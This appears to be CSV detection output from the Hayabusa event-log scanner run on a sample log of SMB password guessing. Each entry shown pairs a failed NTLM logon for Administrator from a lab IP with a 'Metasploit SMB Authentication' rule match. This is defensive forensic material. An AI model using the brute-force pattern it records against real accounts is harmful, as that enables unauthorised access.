+2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BmTtDfX05VsKFrON  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HhWSUkQhv089RSfJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i8RXCiXQYgjuPO78  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pfB3u3Np38FOw6hc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I9GcSmto4jdCIw6H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HsogJdHUcldt7JeH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IUbkohKtCy6joOBY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9ZFyYxBrKnz652Co  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQ2MHr71xALFHJqN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cgjHOgEYRLQiJX75  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QXLjSNCeDAaX4ttQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: np6hwdqnWLJawVn9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: adqqChrYx3lZ0BAa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1GTXkOnNYTws1MiC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5QUvFvCM6AJhKjXe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NiVgC8oJ5W2Xr3t0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hXfhdrbLnNOGDqy6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OcjMGbrHQHxIhSSh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LDYPTYHHKAe39GjM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2PF3H6LE6MqFjVWx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LLTReOoxRa7UAhT3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jqtqwAPBiBfaHNpv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jmisFXzDpOILUhIX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W5UHqVVAYK08FWit  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PKHLHN59FDnD92Sm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ohAKPRGvg1JCQ91y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pxdcrng84HEG39nJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lFGXFxHPbxDTGmiN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tyFnafBgzoLQWTQR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2IjLjxkd2pX4moFy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9vqYC4KotCYTcQv5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qtHcYFIOHglQFb60  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmiHIQrpsAVRJtdb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4TdkChjMAviJ6jr8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sPIGU1rBk0F5cG9P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8ScynGWKK3CtoUsi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0E4JAuxC8MuuGfnw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4aDJtqsUWKyuDqBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yCFrEHUgqCtKPybS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ftrEBfaLGbboV8D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: thle3slH6gZYllyQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PcEnabS7oj98WI0e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EBqGp9CD4A9PsyLk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iil8dQlzMCkKRNUb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nDBqxF9bmNNjNdsm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QJNBRV3BRVEN8hmG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
